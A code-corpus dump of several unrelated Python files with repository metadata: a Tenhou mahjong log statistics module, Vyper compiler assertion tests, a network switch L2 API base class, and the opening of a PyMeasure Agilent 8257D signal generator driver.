fulu : 0.3717,
after_richi : 0.0288,
now_line_days : 3.71,
max_line_days : 16.67,
first_richi : 0.1597,
count : 1000,
}
:param ref_list: ref list
:param player_name: player name
:return: result dict
"""
counter = {}
adder = {}
game_date_text_set = set()
ref_counter = 0
for ref in ref_list:
ref_counter += 1
log = Log(ref)
game_date_text_set.add(log.time.strftime("%Y%m%d"))
player_index = log.get_player_index(player_name)
if player_index < 0:
# should not be here
continue
for sub_log in log.sub_log:
statistics = StatisticForSubLog(sub_log)
results = statistics.get_result(player_index)
for key, value in results.iteritems():
if value is not None:
counter[key] = counter.get(key, 0) + 1
adder[key] = adder.get(key, 0) + value
results = {}
for key, value in counter.iteritems():
results[key] = (adder[key] / float(value)) if value else 0
max_line_days = now_line_days = 0
last_date = None
for date_text in sorted(game_date_text_set):
now_date = datetime.datetime.strptime(date_text, "%Y%m%d")
if last_date:
if int((now_date - last_date).days) <= 1:
now_line_days += 1
max_line_days = max(max_line_days, now_line_days)
else:
now_line_days = 1
last_date = now_date
results['max_line_days'] = max_line_days
results['now_line_days'] = now_line_days
results['count'] = ref_counter
return results
if __name__ == '__main__':
import time
from sqlalchemy import func, desc
from core.models import get_new_session, PlayerLog
session = get_new_session()
counter = func.count(PlayerLog.name)
query = session.query(PlayerLog.name).filter((PlayerLog.lobby == '0000') & (PlayerLog.name != 'NoName')) \
.group_by(PlayerLog.name).having(counter >= 50).order_by(desc(counter))
results = {}
for name in (row[0] for row in query):
start_time = time.time()
query = session.query(PlayerLog.ref).filter((PlayerLog.name == name) & (PlayerLog.lobby == '0000'))
refs = [row[0] for row in query]
results[name] = get_results(refs, name)
size = len(refs)
time_cost = time.time() - start_time
hz = size / time_cost
print '%6d' % size, '%.2fs' % time_cost, '%.2fHz' % hz, name
session.close()
data_lists = {}
for row in results.itervalues():
for key, value in row.iteritems():
data_lists.setdefault(key, []).append(value)
print ''
print '%20s' % 'type', '%6s' % 'avg', '%6s' % 'max', '%6s' % 'min', '%6s' % 'mu'
# import numpy as np
from scipy.stats import norm
# import matplotlib.pyplot as plt
for key, data_list in data_lists.iteritems():
avg = sum(data_list) / float(len(data_list))
mu, std = norm.fit(data_list)
print '%20s' % key, format_data(avg), format_data(max(data_list)), format_data(min(data_list)), format_data(
mu), std
#
# # Plot the histogram.
# plt.hist(data_list, bins=25, normed=True, alpha=0.6, color='g')
#
# # Plot the PDF.
# xmin, xmax = plt.xlim()
# x = np.linspace(xmin, xmax, 100)
# p = norm.pdf(x, mu, std)
# plt.plot(x, p, 'k', linewidth=2)
# title = "%s fit results: mu = %.2f, std = %.2f" % (key, mu, std)
# plt.title(title)
#
# plt.show()
| 29.802532
| 116
| 0.569147
|
#!/usr/bin/env python
# coding=utf-8
"""
core.tenhou.log
"""
__author__ = 'Rnd495'
import os
import json
import datetime
import urllib
from core.configs import Configs
configs = Configs.instance()
class Log(object):
"""
Log
"""
def __init__(self, ref):
with open(Log.get_file_name(ref), 'rb') as file_handle:
self.json = json.load(file_handle)
# cache
self._scores = None
self._rankings = None
@property
def size(self):
return len(self.names)
@property
def sub_log(self):
return self.json['log']
@property
def ref(self):
return self.json['ref']
@property
def rule(self):
return self.json['rule']['disp']
@property
def lobby(self):
return self.ref.split('-')[2]
@property
def rule_code(self):
return self.ref.split('-')[1]
@property
def dans(self):
return self.json['dan']
@property
def names(self):
return self.json['name']
@property
def scores(self):
if not self._scores:
g = iter(self.json['sc'])
self._scores = zip(g, g)
return self._scores
@property
def time(self):
return datetime.datetime.strptime(self.ref[:10], '%Y%m%d%H')
@property
def points(self):
return [point[0] for point in self.scores]
@property
def pts(self):
return [point[1] for point in self.scores]
@property
def rankings(self):
if not self._rankings:
point_sorted = sorted(((point, index) for index, point in enumerate(self.points)), reverse=True)
self._rankings = [None] * len(point_sorted)
for ranking, (_, index) in enumerate(point_sorted):
self._rankings[index] = ranking
return self._rankings
@property
def rates(self):
return self.json['rate']
@staticmethod
def check_exists(ref):
return os.path.exists(Log.get_file_name(ref))
@staticmethod
def get_file_name(ref):
return os.path.join(configs.tenhou_log_dir, '%s.json' % ref)
@staticmethod
def iter_all():
for root, dirs, files in os.walk(configs.tenhou_log_dir):
for file_name in files:
ref = os.path.splitext(file_name)[0]
yield Log(ref)
def get_player_index(self, name):
try:
return self.names.index(name)
except ValueError:
return None
def get_tenhou_link(self, tw_name=None):
base = "/watch/log?"
params = {'ref': self.ref}
for i, name in enumerate(self.names):
if isinstance(name, unicode):
name = name.encode("utf-8")
params['UN%d' % i] = name
tw = None
if tw_name:
tw = self.get_player_index(tw_name)
if tw is not None:
params['tw'] = tw
return base + urllib.urlencode(params)
class StatisticForSubLog(object):
"""
StatisticForSubLog
"""
def __init__(self, sub_log):
self.sub_log = sub_log
self._richi_list = None
self._fulu_list = None
@property
def game_size(self):
return len(self.point_starts)
@property
def game_index(self):
return self.sub_log[0]
@property
def dora_pointers_out(self):
return self.sub_log[2]
@property
def dora_pointers_in(self):
return self.sub_log[3]
@property
def start_cards(self):
return self.sub_log[4:4 + 3 * self.game_size:3]
@property
def cards_ins(self):
return self.sub_log[5:5 + 3 * self.game_size:3]
@property
def cards_outs(self):
return self.sub_log[6:6 + 3 * self.game_size:3]
@property
def result_list(self):
return self.sub_log[16]
@property
def is_agari(self):
return self.result_description == u'和了'
@property
def result_description(self):
return self.result_list[0]
@property
def point_starts(self):
return self.sub_log[1]
@property
def point_changes(self):
return self.result_list[1::2]
@property
def richi_list(self):
if self._richi_list is None:
self._get_player_details()
return self._richi_list
@property
def is_fulu_list(self):
if self._fulu_list is None:
self._get_player_details()
return self._fulu_list
def _get_player_details(self):
self._richi_list = [None] * self.game_size
self._fulu_list = [False] * self.game_size
# scan card outs
for player_index, card_out in enumerate(self.cards_outs):
for time_index, action in enumerate(card_out):
if self._richi_list[player_index] is not None:
break
if self._fulu_list[player_index]:
break
if not isinstance(action, int):
if action.startswith('r'):
self._richi_list[player_index] = (time_index, action)
else:
self._fulu_list[player_index] = True
# scan card ins
for player_index, card_in in enumerate(self.cards_ins):
for time_index, action in enumerate(card_in):
if self._richi_list[player_index] is not None:
richi_time, richi_action = self._richi_list[player_index]
if time_index >= richi_time:
break
if self._fulu_list[player_index]:
break
elif not isinstance(action, int):
self._fulu_list[player_index] = True
def get_result(self, player_index):
# attack
point_change = sum(sc[player_index] for sc in self.point_changes)
win = self.is_agari and point_change > 0
win_point = point_change if win else None
# speed
first_richi = self.richi_list[player_index]
if first_richi:
for richi in self.richi_list:
if richi is not None and richi[0] < first_richi[0]:
first_richi = False
break
first_richi = bool(first_richi)
win_time = None
if win:
win_time = len(self.cards_ins[player_index])
# int
dama = None
if win:
dama = not self.is_fulu_list[player_index] and not self.richi_list[player_index]
ends_listening = None
if self.result_description == u'全員聴牌':
ends_listening = True
elif self.result_description == u'流局':
ends_listening = point_change > 0
# def
someone_chong = self.result_description == u'和了' and \
len(self.point_changes) == 1 and \
sum(p < 0 for p in self.point_changes[0]) == 1
chong = someone_chong and point_change < 0
fulu_chong = None
if chong:
fulu_chong = self.is_fulu_list[player_index]
# brave
after_richi = not first_richi and bool(self.richi_list[player_index])
fulu = self.is_fulu_list[player_index]
return dict(
win=win, win_point=win_point,
first_richi=first_richi, win_time=win_time,
dama=dama, ends_listening=ends_listening,
chong=chong, fulu_chong=fulu_chong,
after_richi=after_richi, fulu=fulu
)
def get_results(ref_list, player_name):
"""
do statistics on given refs for given player
result dict format (example value is avg value on data set 2015/05/15) :
{
fulu_chong : 0.3940,
dama : 0.1165,
win_time : 11.50,
chong : 0.1347,
win : 0.2484,
win_point : 6690,
ends_listening : 0.5170,
fulu : 0.3717,
after_richi : 0.0288,
now_line_days : 3.71,
max_line_days : 16.67,
first_richi : 0.1597,
count : 1000,
}
:param ref_list: ref list
:param player_name: player name
:return: result dict
"""
counter = {}
adder = {}
game_date_text_set = set()
ref_counter = 0
for ref in ref_list:
ref_counter += 1
log = Log(ref)
game_date_text_set.add(log.time.strftime("%Y%m%d"))
player_index = log.get_player_index(player_name)
if player_index < 0:
# should not be here
continue
for sub_log in log.sub_log:
statistics = StatisticForSubLog(sub_log)
results = statistics.get_result(player_index)
for key, value in results.iteritems():
if value is not None:
counter[key] = counter.get(key, 0) + 1
adder[key] = adder.get(key, 0) + value
results = {}
for key, value in counter.iteritems():
results[key] = (adder[key] / float(value)) if value else 0
max_line_days = now_line_days = 0
last_date = None
for date_text in sorted(game_date_text_set):
now_date = datetime.datetime.strptime(date_text, "%Y%m%d")
if last_date:
if int((now_date - last_date).days) <= 1:
now_line_days += 1
max_line_days = max(max_line_days, now_line_days)
else:
now_line_days = 1
last_date = now_date
results['max_line_days'] = max_line_days
results['now_line_days'] = now_line_days
results['count'] = ref_counter
return results
if __name__ == '__main__':
import time
from sqlalchemy import func, desc
from core.models import get_new_session, PlayerLog
session = get_new_session()
counter = func.count(PlayerLog.name)
query = session.query(PlayerLog.name).filter((PlayerLog.lobby == '0000') & (PlayerLog.name != 'NoName')) \
.group_by(PlayerLog.name).having(counter >= 50).order_by(desc(counter))
results = {}
for name in (row[0] for row in query):
start_time = time.time()
query = session.query(PlayerLog.ref).filter((PlayerLog.name == name) & (PlayerLog.lobby == '0000'))
refs = [row[0] for row in query]
results[name] = get_results(refs, name)
size = len(refs)
time_cost = time.time() - start_time
hz = size / time_cost
print '%6d' % size, '%.2fs' % time_cost, '%.2fHz' % hz, name
session.close()
data_lists = {}
for row in results.itervalues():
for key, value in row.iteritems():
data_lists.setdefault(key, []).append(value)
def format_data(d):
if d < 1:
return '%6s' % ('%.2f%%' % (d * 100))
elif abs(d) < 100:
return '%6s' % ('%.2f' % d)
else:
return '%6s' % ('%d' % d)
print ''
print '%20s' % 'type', '%6s' % 'avg', '%6s' % 'max', '%6s' % 'min', '%6s' % 'mu'
# import numpy as np
from scipy.stats import norm
# import matplotlib.pyplot as plt
for key, data_list in data_lists.iteritems():
avg = sum(data_list) / float(len(data_list))
mu, std = norm.fit(data_list)
print '%20s' % key, format_data(avg), format_data(max(data_list)), format_data(min(data_list)), format_data(
mu), std
#
# # Plot the histogram.
# plt.hist(data_list, bins=25, normed=True, alpha=0.6, color='g')
#
# # Plot the PDF.
# xmin, xmax = plt.xlim()
# x = np.linspace(xmin, xmax, 100)
# p = norm.pdf(x, mu, std)
# plt.plot(x, p, 'k', linewidth=2)
# title = "%s fit results: mu = %.2f, std = %.2f" % (key, mu, std)
# plt.title(title)
#
# plt.show()
| 30
| 2,357
| 0
| 4,883
| 0
| 185
| 0
| 0
| 73
|
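The max_line_days / now_line_days bookkeeping inside get_results above tracks the longest and the current streak of consecutive play dates. The same idea isolated into a small standalone helper (counting is simplified so that a lone day counts as a streak of 1, which differs slightly from the original):

# Illustrative only -- consecutive-days streak logic over "%Y%m%d" date strings.
from datetime import datetime

def streaks(date_texts):
    max_streak = streak = 0
    last = None
    for text in sorted(set(date_texts)):
        day = datetime.strptime(text, "%Y%m%d")
        if last is not None and (day - last).days <= 1:
            streak += 1
        else:
            streak = 1
        max_streak = max(max_streak, streak)
        last = day
    return max_streak, streak

print(streaks(["20150511", "20150512", "20150513", "20150515"]))  # (3, 1)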
b97e642f766dedecd2b8dc7fbaf1c4aba0a274fb
| 5,267
|
py
|
Python
|
tests/parser/features/test_assert.py
|
upgradvisor/vyper
|
642884ea938a25793c1b2fac866e8458e63a7b49
|
[
"Apache-2.0"
] | 1
|
2021-12-20T16:19:47.000Z
|
2021-12-20T16:19:47.000Z
|
tests/parser/features/test_assert.py
|
upgradvisor/vyper
|
642884ea938a25793c1b2fac866e8458e63a7b49
|
[
"Apache-2.0"
] | 1
|
2022-03-19T00:45:47.000Z
|
2022-03-19T00:45:47.000Z
|
tests/parser/features/test_assert.py
|
upgradvisor/vyper
|
642884ea938a25793c1b2fac866e8458e63a7b49
|
[
"Apache-2.0"
] | null | null | null |
# web3 returns f"execution reverted: {err_str}"
# TODO move exception string parsing logic into assert_tx_failed
invalid_code = [
"""
@external
def test(a: int128) -> int128:
assert a > 1, ""
return 1 + a
""",
"""
@external
def test(a: int128) -> int128:
raise ""
""",
"""
@external
def test():
assert create_forwarder_to(self)
""",
]
valid_code = [
"""
@external
def mint(_to: address, _value: uint256):
raise
""",
"""
@internal
def ret1() -> int128:
return 1
@external
def test():
assert self.ret1() == 1
""",
"""
@internal
def valid_address(sender: address) -> bool:
selfdestruct(sender)
@external
def test():
assert self.valid_address(msg.sender)
""",
"""
@external
def test():
assert raw_call(msg.sender, b'', max_outsize=1, gas=10, value=1000*1000) == b''
""",
"""
@external
def test():
assert create_forwarder_to(self) == self
""",
]
| 25.444444
| 94
| 0.65806
|
import pytest
from eth_abi import decode_single
from eth_tester.exceptions import TransactionFailed
# web3 returns f"execution reverted: {err_str}"
# TODO move exception string parsing logic into assert_tx_failed
def _fixup_err_str(s):
return s.replace("execution reverted: ", "")
def test_assert_refund(w3, get_contract_with_gas_estimation, assert_tx_failed):
code = """
@external
def foo():
assert 1 == 2
"""
c = get_contract_with_gas_estimation(code)
a0 = w3.eth.accounts[0]
gas_sent = 10 ** 6
tx_hash = c.foo(transact={"from": a0, "gas": gas_sent, "gasPrice": 10})
# More info on receipt status:
# https://github.com/ethereum/EIPs/blob/master/EIPS/eip-658.md#specification.
tx_receipt = w3.eth.getTransactionReceipt(tx_hash)
assert tx_receipt["status"] == 0
# Checks for gas refund from revert
assert tx_receipt["gasUsed"] < gas_sent
def test_assert_reason(w3, get_contract_with_gas_estimation, assert_tx_failed, memory_mocker):
code = """
@external
def test(a: int128) -> int128:
assert a > 1, "larger than one please"
return 1 + a
@external
def test2(a: int128, b: int128, extra_reason: String[32]) -> int128:
c: int128 = 11
assert a > 1, "a is not large enough"
assert b == 1, concat("b may only be 1", extra_reason)
return a + b + c
@external
def test3(reason_str: String[32]):
raise reason_str
"""
c = get_contract_with_gas_estimation(code)
assert c.test(2) == 3
with pytest.raises(TransactionFailed) as e_info:
c.test(0)
assert _fixup_err_str(e_info.value.args[0]) == "larger than one please"
# a = 0, b = 1
with pytest.raises(TransactionFailed) as e_info:
c.test2(0, 1, "")
assert _fixup_err_str(e_info.value.args[0]) == "a is not large enough"
# a = 1, b = 0
with pytest.raises(TransactionFailed) as e_info:
c.test2(2, 2, " because I said so")
assert _fixup_err_str(e_info.value.args[0]) == "b may only be 1" + " because I said so"
# return correct value
assert c.test2(5, 1, "") == 17
with pytest.raises(TransactionFailed) as e_info:
c.test3("An exception")
assert _fixup_err_str(e_info.value.args[0]) == "An exception"
invalid_code = [
"""
@external
def test(a: int128) -> int128:
assert a > 1, ""
return 1 + a
""",
"""
@external
def test(a: int128) -> int128:
raise ""
""",
"""
@external
def test():
assert create_forwarder_to(self)
""",
]
@pytest.mark.parametrize("code", invalid_code)
def test_invalid_assertions(get_contract, assert_compile_failed, code):
assert_compile_failed(lambda: get_contract(code))
valid_code = [
"""
@external
def mint(_to: address, _value: uint256):
raise
""",
"""
@internal
def ret1() -> int128:
return 1
@external
def test():
assert self.ret1() == 1
""",
"""
@internal
def valid_address(sender: address) -> bool:
selfdestruct(sender)
@external
def test():
assert self.valid_address(msg.sender)
""",
"""
@external
def test():
assert raw_call(msg.sender, b'', max_outsize=1, gas=10, value=1000*1000) == b''
""",
"""
@external
def test():
assert create_forwarder_to(self) == self
""",
]
@pytest.mark.parametrize("code", valid_code)
def test_valid_assertions(get_contract, code):
get_contract(code)
def test_assert_staticcall(get_contract, assert_tx_failed, memory_mocker):
foreign_code = """
state: uint256
@external
def not_really_constant() -> uint256:
self.state += 1
return self.state
"""
code = """
interface ForeignContract:
def not_really_constant() -> uint256: view
@external
def test():
assert ForeignContract(msg.sender).not_really_constant() == 1
"""
c1 = get_contract(foreign_code)
c2 = get_contract(code, *[c1.address])
# static call prohibits state change
assert_tx_failed(lambda: c2.test())
def test_assert_in_for_loop(get_contract, assert_tx_failed, memory_mocker):
code = """
@external
def test(x: uint256[3]) -> bool:
for i in range(3):
assert x[i] < 5
return True
"""
c = get_contract(code)
c.test([1, 2, 3])
assert_tx_failed(lambda: c.test([5, 1, 3]))
assert_tx_failed(lambda: c.test([1, 5, 3]))
assert_tx_failed(lambda: c.test([1, 3, 5]))
def test_assert_with_reason_in_for_loop(get_contract, assert_tx_failed, memory_mocker):
code = """
@external
def test(x: uint256[3]) -> bool:
for i in range(3):
assert x[i] < 5, "because reasons"
return True
"""
c = get_contract(code)
c.test([1, 2, 3])
assert_tx_failed(lambda: c.test([5, 1, 3]))
assert_tx_failed(lambda: c.test([1, 5, 3]))
assert_tx_failed(lambda: c.test([1, 3, 5]))
def test_assert_reason_revert_length(w3, get_contract, memory_mocker):
code = """
@external
def test() -> int128:
assert 1 == 2, "oops"
return 1
"""
c = get_contract(code)
w3.manager.provider.ethereum_tester.backend.is_eip838_error = lambda err: False
with pytest.raises(TransactionFailed) as e_info:
c.test()
error_bytes = eval(_fixup_err_str(e_info.value.args[0]))
assert len(error_bytes) == 100
msg = decode_single("string", error_bytes[36:])
assert msg == "oops"
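The 100-byte revert payload checked above is the standard ABI encoding of Error(string): a 4-byte selector, a 32-byte offset word, a 32-byte length word, and the string data right-padded to 32 bytes, which is why the test decodes the string starting at byte 36. A minimal sketch of that decoding, reusing the same decode_single helper the test already uses (the selector constant is the well-known keccak("Error(string)") prefix; this sketch is illustrative, not part of the test suite):
def decode_revert_reason(error_bytes):
    # bytes 0-3   -> selector 0x08c379a0 for Error(string)
    # bytes 4-35  -> offset of the string within the payload (0x20)
    # bytes 36-67 -> string length
    # bytes 68-99 -> string data, right-padded to 32 bytes ("oops" -> 100 bytes total)
    assert error_bytes[:4] == bytes.fromhex("08c379a0")
    return decode_single("string", error_bytes[36:])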
| 0
| 244
| 0
| 0
| 0
| 3,754
| 0
| 34
| 272
|
3f29ebd88cd6558019edc58f99d89c4d08dc0aae
| 8,654
|
py
|
Python
|
netl2api/l2api/__init__.py
|
locaweb/netl2api
|
f84c0362d1676c8771015b7cc48461e44a21c34d
|
[
"Apache-2.0"
] | 3
|
2015-04-08T18:50:02.000Z
|
2019-06-05T22:40:45.000Z
|
netl2api/l2api/__init__.py
|
locaweb/netl2api
|
f84c0362d1676c8771015b7cc48461e44a21c34d
|
[
"Apache-2.0"
] | null | null | null |
netl2api/l2api/__init__.py
|
locaweb/netl2api
|
f84c0362d1676c8771015b7cc48461e44a21c34d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8; -*-
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @author: Eduardo S. Scarpellini
# @author: Luiz Ozaki
__copyright__ = "Copyright 2012, Locaweb IDC"
__all__ = ["L2API"]
| 40.064815
| 122
| 0.605616
|
#!/usr/bin/python
# -*- coding: utf-8; -*-
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @author: Eduardo S. Scarpellini
# @author: Luiz Ozaki
__copyright__ = "Copyright 2012, Locaweb IDC"
from netl2api.l2api.exceptions import *
from netl2api.l2api.autocache import L2APIAutoCache
from netl2api.l2api.transport import SysSSHTransport #, TransportManager
__all__ = ["L2API"]
class L2API(L2APIAutoCache):
"""
Base class for L2 operations.
Vendor-specific classes should extend this, declare 'self.__VENDOR__' (vendor str),
'self.__HWTYPE__' (hardware type str), 'self.prompt_mark', 'self.error_mark' and
    'self.config_term_cmd' (see the transport classes to understand these last three parameters).
Ex.:
class ExampleVendorAPI(L2API):
def __init__(self, *args, **kwargs):
self.__VENDOR__ = "ExampleVendor"
self.__HWTYPE__ = "stackable_switch"
self.prompt_mark = "#"
self.error_mark = "% Error:"
self.config_term_cmd = "terminal length 0"
super(ExampleVendorAPI, self).__init__(*args, **kwargs)
...
def show_version(self):
...
def show_interfaces(self):
....
"""
def __init__(self, host=None, port=None, username=None, passwd=None, transport=None):
super(L2API, self).__init__()
if not hasattr(self, "__VENDOR__"):
raise InvalidParameter("'self.__VENDOR__' is not defined (class '%s')" % self.__class__.__name__)
if not hasattr(self, "__HWTYPE__"):
raise InvalidParameter("'self.__HWTYPE__' is not defined (class '%s')" % self.__class__.__name__)
if not host or type(host) not in (str, unicode):
raise InvalidParameter("'host' parameter is not defined or invalid")
if not username or type(username) not in (str, unicode):
raise InvalidParameter("'username' parameter is not defined or invalid")
if not passwd or type(passwd) not in (str, unicode):
raise InvalidParameter("'passwd' parameter is not defined or invalid")
if not hasattr(self, "prompt_mark"):
self.prompt_mark = "#"
if not hasattr(self, "error_mark"):
self.error_mark = None
if not hasattr(self, "config_term_cmd"):
self.config_term_cmd = None
if not transport:
transport = SysSSHTransport.SysSSH
self.use_cache = True
self.cache_config = {
"show_system": { "ttl": 600,
"clear_on": [] },
"show_hostname": { "ttl": 600,
"clear_on": [] },
"show_version": { "ttl": 600,
"clear_on": [] },
"show_interfaces": { "ttl": 120,
"clear_on": ["enable_interface", "disable_interface",
"change_interface_description"] },
"show_lldp": { "ttl": 180,
"clear_on": [] },
"show_arp": { "ttl": 180,
"clear_on": [] },
"show_uplinks": { "ttl": 180,
"clear_on": [] },
"show_vlans": { "ttl": 180,
"clear_on": ["create_vlan", "destroy_vlan",
"enable_vlan", "disable_vlan",
"change_vlan_description",
"interface_attach_vlan", "interface_detach_vlan",
"lag_attach_vlan", "lag_detach_vlan"] },
"show_lags": { "ttl": 180,
"clear_on": ["create_lag", "destroy_lag",
"enable_lag", "disable_lag",
"change_lag_description",
"lag_attach_interface", "lag_detach_interface"] },
}
#self.transport = TransportManager.TransportPool(transport=transport, max_connections=2, host=host, port=port,
# username=username, passwd=passwd, prompt_mark=self.prompt_mark,
# error_mark=self.error_mark, config_term_cmd=self.config_term_cmd)
self.transport = transport(host=host, port=port, username=username, passwd=passwd, prompt_mark=self.prompt_mark,
error_mark=self.error_mark, config_term_cmd=self.config_term_cmd)
def dump_config(self):
raise NotImplementedError("Not implemented")
def save_config(self):
raise NotImplementedError("Not implemented")
def show_system(self):
raise NotImplementedError("Not implemented")
def show_hostname(self):
raise NotImplementedError("Not implemented")
def show_version(self):
raise NotImplementedError("Not implemented")
def show_interfaces(self, interface_id=None):
raise NotImplementedError("Not implemented")
def show_lldp(self, interface_id=None):
raise NotImplementedError("Not implemented")
def show_arp(self, interface_id=None):
raise NotImplementedError("Not implemented")
def show_uplinks(self):
raise NotImplementedError("Not implemented")
def show_vlans(self, vlan_id=None):
raise NotImplementedError("Not implemented")
def show_lags(self, lag_id=None):
raise NotImplementedError("Not implemented")
def create_vlan(self, vlan_id=None, vlan_description=None):
raise NotImplementedError("Not implemented")
def create_lag(self, lag_id=None, lag_description=None):
raise NotImplementedError("Not implemented")
def enable_interface(self, interface_id=None):
raise NotImplementedError("Not implemented")
def enable_vlan(self, vlan_id=None):
raise NotImplementedError("Not implemented")
def enable_lag(self, lag_id=None):
raise NotImplementedError("Not implemented")
def disable_interface(self, interface_id=None):
raise NotImplementedError("Not implemented")
def disable_vlan(self, vlan_id=None):
raise NotImplementedError("Not implemented")
def disable_lag(self, lag_id=None):
raise NotImplementedError("Not implemented")
def change_interface_description(self, interface_id=None, interface_description=None):
raise NotImplementedError("Not implemented")
def change_vlan_description(self, vlan_id=None, vlan_description=None):
raise NotImplementedError("Not implemented")
def change_lag_description(self, lag_id=None, lag_description=None):
raise NotImplementedError("Not implemented")
def destroy_vlan(self, vlan_id=None):
raise NotImplementedError("Not implemented")
def destroy_lag(self, lag_id=None):
raise NotImplementedError("Not implemented")
def interface_attach_vlan(self, interface_id=None, vlan_id=None, tagged=True):
raise NotImplementedError("Not implemented")
def interface_detach_vlan(self, interface_id=None, vlan_id=None, tagged=True):
raise NotImplementedError("Not implemented")
def lag_attach_vlan(self, lag_id=None, vlan_id=None, tagged=True):
raise NotImplementedError("Not implemented")
def lag_detach_vlan(self, lag_id=None, vlan_id=None, tagged=True):
raise NotImplementedError("Not implemented")
def lag_attach_interface(self, lag_id=None, interface_id=None):
raise NotImplementedError("Not implemented")
def lag_detach_interface(self, lag_id=None, interface_id=None):
raise NotImplementedError("Not implemented")
# def __del__(self):
# if self.transport is not None:
# try:
# self.transport.close()
# except Exception:
# pass
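A minimal, hypothetical sketch of the extension pattern the class docstring describes: a vendor module subclasses L2API, sets the required vendor/transport attributes before calling the parent constructor, and then implements the show_*/create_* methods it supports. The vendor strings, host and credentials below are placeholders and the show_version body is illustrative only.
class ExampleVendorAPI(L2API):
    def __init__(self, *args, **kwargs):
        self.__VENDOR__ = "ExampleVendor"          # required by L2API.__init__
        self.__HWTYPE__ = "stackable_switch"       # required by L2API.__init__
        self.prompt_mark = "#"                     # consumed by the transport class
        self.error_mark = "% Error:"
        self.config_term_cmd = "terminal length 0"
        super(ExampleVendorAPI, self).__init__(*args, **kwargs)
    def show_version(self):
        # a real implementation would run a command through self.transport and parse it
        return {"version": "illustrative-only"}
#switch = ExampleVendorAPI(host="192.0.2.1", username="admin", passwd="secret")
#switch.show_version()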
| 0
| 0
| 0
| 7,694
| 0
| 0
| 0
| 79
| 110
|
53e3d50dfd8819a70c242ed90be54300221236ee
| 12,531
|
py
|
Python
|
pymeasure/instruments/agilent/agilent8257D.py
|
dphaas/pymeasure
|
580c33bf5f1e409bb575c46bbd1df682bf27cfe1
|
[
"MIT"
] | null | null | null |
pymeasure/instruments/agilent/agilent8257D.py
|
dphaas/pymeasure
|
580c33bf5f1e409bb575c46bbd1df682bf27cfe1
|
[
"MIT"
] | null | null | null |
pymeasure/instruments/agilent/agilent8257D.py
|
dphaas/pymeasure
|
580c33bf5f1e409bb575c46bbd1df682bf27cfe1
|
[
"MIT"
] | null | null | null |
#
# This file is part of the PyMeasure package.
#
# Copyright (c) 2013-2022 PyMeasure Developers
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
| 36.533528
| 100
| 0.615194
|
#
# This file is part of the PyMeasure package.
#
# Copyright (c) 2013-2022 PyMeasure Developers
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
from pymeasure.instruments import Instrument
from pymeasure.instruments.validators import truncated_range, strict_discrete_set
class Agilent8257D(Instrument):
"""Represents the Agilent 8257D Signal Generator and
provides a high-level interface for interacting with
the instrument.
.. code-block:: python
generator = Agilent8257D("GPIB::1")
generator.power = 0 # Sets the output power to 0 dBm
generator.frequency = 5 # Sets the output frequency to 5 GHz
generator.enable() # Enables the output
"""
power = Instrument.control(
":POW?;", ":POW %g dBm;",
""" A floating point property that represents the output power
in dBm. This property can be set.
"""
)
frequency = Instrument.control(
":FREQ?;", ":FREQ %e Hz;",
""" A floating point property that represents the output frequency
in Hz. This property can be set.
"""
)
start_frequency = Instrument.control(
":SOUR:FREQ:STAR?", ":SOUR:FREQ:STAR %e Hz",
""" A floating point property that represents the start frequency
in Hz. This property can be set.
"""
)
center_frequency = Instrument.control(
":SOUR:FREQ:CENT?", ":SOUR:FREQ:CENT %e Hz;",
""" A floating point property that represents the center frequency
in Hz. This property can be set.
"""
)
stop_frequency = Instrument.control(
":SOUR:FREQ:STOP?", ":SOUR:FREQ:STOP %e Hz",
""" A floating point property that represents the stop frequency
in Hz. This property can be set.
"""
)
start_power = Instrument.control(
":SOUR:POW:STAR?", ":SOUR:POW:STAR %e dBm",
""" A floating point property that represents the start power
